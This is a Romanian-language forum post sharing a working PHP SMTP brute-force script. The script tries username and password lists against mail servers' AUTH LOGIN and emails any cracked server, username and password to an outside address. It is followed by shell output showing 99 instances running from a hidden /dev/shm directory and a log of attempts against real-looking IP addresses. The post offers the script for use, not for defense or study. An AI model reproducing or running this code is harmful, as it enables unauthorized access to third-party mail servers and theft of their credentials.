Te-ai complicat enorm. Puteai extrage doar ce-ti trebuie din phpmailer. <?php error_reporting(0); $_UserFile = "user.file"; $_PassFile = "pass.file"; function S_Server($_server, $_username, $_password) { print "[+]Found $_username/$_password on $_server\r\n"; if(!($_OutFile = fopen("cracked.smtp", "a"))) ExitF ("Cannot open the lo g file"); fputs($_OutFile, "[+]Cracked: $_server $_username $_password\r\n"); fclose($_OutFile); exit(0); } function ExitF($errmsg) { print "[-]" . $errmsg . "\r\n"; exit(0); } function CrackSMTP($server, $username, $password) { $socket = fsockopen($server, 25, $errno, $errstr, 2); if (!$socket) ExitF ("SOCKET ERROR!"); stream_set_timeout($socket, 2); $_SockResult = fgets($socket, 512); if (substr(trim($_SockResult), 0, 3) != "220") ExitF ("220 Error"); fputs($socket, "EHLO USER\r\n"); $_SockResult = fgets($socket, 512); while(substr(trim($_SockResult), 0, 4) == "250-") $_SockResult = fgets($ socket, 512); fputs($socket, "AUTH LOGIN\r\n"); if (!($_SockResult = fgets($socket, 512))) ExitF ("AUTH LOGIN Error"); if (substr(trim($_SockResult), 4, 16) != "VXNlcm5hbWU6") ExitF ("RECEIVE USER PROMPT Error"); $Encrypt_User = base64_encode($username); fputs($socket, "$Encrypt_User\r\n"); if (!($_SockResult = fgets($socket, 512))) ExitF ("SEND USER Error"); if (substr(trim($_SockResult), 4, 16) != "UGFzc3dvcmQ6") ExitF ("RECEIVE PASSWORD PROMPT Error"); $Encrypt_Password = base64_encode($password); fputs($socket, "$Encrypt_Password\r\n"); if (!($_SockResult = fgets($socket, 512))) ExitF ("SEND PASSWORD Error") ; if (substr(trim($_SockResult), 0, 3) != "235") { print "$server: $username/$password - INVALID\r\n"; return "INVALID"; } fputs($socket, "RSET\r\n"); if (!($_SockResult = fgets($socket, 512))) ExitF ("RSET Error"); fputs($socket, "MAIL FROM: admin@xoffice.com\r\n"); if (!($_SockResult = fgets($socket, 512))) ExitF ("MAIL FROM Error"); fputs($socket, "RCPT TO: galford@inbox.com\r\n"); if (!($_SockResult = fgets($socket, 512))) ExitF ("RCPT TO Error"); fputs($socket, "DATA\r\n"); if (!($_SockResult = fgets($socket, 512))) ExitF ("DATA Error"); fputs($socket, "Content-Type: text/html\r\n"); fputs($socket, "SUBJECT: Elite Server $server $username $password\r\n"); fputs($socket, "FROM: SMTP Admin <admin@xoffice.com>\r\n"); fputs($socket, "TO: galford@inbox.com\r\n"); fputs($socket, "\r\n Happy New Year\r\n $server $username $password\r\n. \r\n"); fputs($socket, "QUIT\r\n"); fclose($socket); S_Server ($server, $username, $password); exit(0); } if (!($_SRV = $argv[1])) ExitF ("Usage: $argv[0] <hostname>"); if (!($F_UserFile = fopen($_UserFile, "r"))) ExitF ("Cannot open the username fi le"); $_Var = 0; $_Counter = 0; while (!feof($F_UserFile)) { $_username = fgets($F_UserFile, 64); $username = str_replace("\n", "", $_username); if ($username != "") { $user[$_Var] = $username; $pass[$_Var] = $username; $_Var++; $_Counter = $_Counter + 1; $user[$_Var] = $username; $pass[$_Var] = $username . "1"; $_Var++; $_Counter = $_Counter + 1; $user[$_Var] = $username; $pass[$_Var] = $username . "12"; $_Var++; $_Counter = $_Counter + 1; $user[$_Var] = $username; $pass[$_Var] = $username . "123"; $_Var++; $_Counter = $_Counter + 1; if (!($F_PassFile = fopen($_PassFile, "r"))) ExitF ("Cannot open the password file"); while (!feof($F_PassFile)) { $user[$_Var] = $username; $pass[$_Var] = fgets($F_PassFile, 64); $pass[$_Var] = str_replace("\n", "", $pass[$_Var]); $_Var++; $_Counter++; } fclose($F_PassFile); } } fclose ($F_UserFile); for ( $_Var = 0; $_Var < $_Counter; $_Var++ ) CrackSMTP($_SRV, $user[$_Var], $pa ss[$_Var]); exit(0); ?> Incearca procedurea asta. E mai clean si nu face load average absolut deloc. root@admin [/dev/shm/.img]# ps -eaf | grep -c smtp.php 99 root@admin [/dev/shm/.img]# Uite la 99 procese pornite ce load average: root@admin [/dev/shm/.img]# w 20:42:21 up 1 day, 3 min, 2 users, load average: 0.37, 0.50, 0.68 SMTP brute-ul meu arata ceva de genul in action: 109.167.132.120: antonio/letmein - INVALID 109.168.123.58: test/mypass - INVALID 109.164.235.34: henry/1234567 - INVALID 109.123.106.182: charles/charles - INVALID 109.168.125.210: online/online - INVALID 109.168.122.135: spam/secret - INVALID 109.164.219.206: patrick/letmein - INVALID 109.164.235.113: gary/secret - INVALID 109.168.58.134: benjamin/12345678 - INVALID 109.168.123.54: test/123456789 - INVALID 109.164.235.168: henry/password - INVALID 109.168.31.114: randy/123456789 - INVALID 109.164.143.33: roger/roger - INVALID 109.168.28.18: billy/billy123 - INVALID